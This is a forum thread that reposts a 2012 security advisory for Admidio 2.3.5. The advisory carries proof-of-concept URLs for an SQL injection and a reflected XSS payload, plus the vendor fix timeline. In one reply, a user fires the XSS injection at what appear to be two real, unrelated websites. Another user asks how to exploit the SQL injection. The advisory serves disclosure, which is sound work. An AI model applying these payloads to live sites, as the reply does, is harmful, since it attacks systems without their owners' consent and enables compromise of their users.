The_Arhitect Posted September 2, 2012 Report Share Posted September 2, 2012 Admidio 2.3.5 Multiple VulnerabilitiesAdvisory: Admidio 2.3.5 Multiple security vulnerabilitiesAdvisory ID: SSCHADV2012-019Author: Stefan SchurtzAffected Software: Successfully tested on Admidio 2.3.5Vendor URL: http://www.admidio.org/Vendor Status: fixed==========================Vulnerability Description==========================Admidio 2.3.5 is prone to XSS and SQLi vulnerabilities==================PoC-Exploit==================//SQLihttp://[target]/admidio-2.3.5/adm_program/modules/lists/lists.php?active_role=[sql-injection]//XSShttp://[target]/admidio-2.3.5/adm_program/modules/guestbook/guestbook_new.php?headline=" onmouseover=alert(/xss/) "=========Solution=========Upgrade to the latest version 2.3.6====================Disclosure Timeline====================21-Aug-2012 - developer informed21-Aug-2012 - feedback from developer28-Aug-2012 - fixed in version 2.3.6========Credits========Vulnerabilities found and advisory written by Stefan Schurtz.===========References===========http://www.admidio.org/forum/viewtopic.php?t=5108http://www.darksecurity.de/advisories/2012/SSCHADV2012-019.txtSursa: Admidio 2.3.5 Multiple Vulnerabilities Quote Link to comment Share on other sites More sharing options...
abraxyss Posted September 10, 2012 Report Share Posted September 10, 2012 (edited) http://herren1.bplaced.net/admidio/adm_program/modules/guestbook/guestbook_new.php?headline=%27http://2b2x3.w4yserver.at/intern/adm_program/modules/guestbook/guestbook_new.php?headline='"+/>+mada+fa+KAms , e lux Edited September 13, 2012 by abraxyss Quote Link to comment Share on other sites More sharing options...
KohCGI Posted September 10, 2012 Report Share Posted September 10, 2012 Cum se exploateaza SQL ala? Quote Link to comment Share on other sites More sharing options...
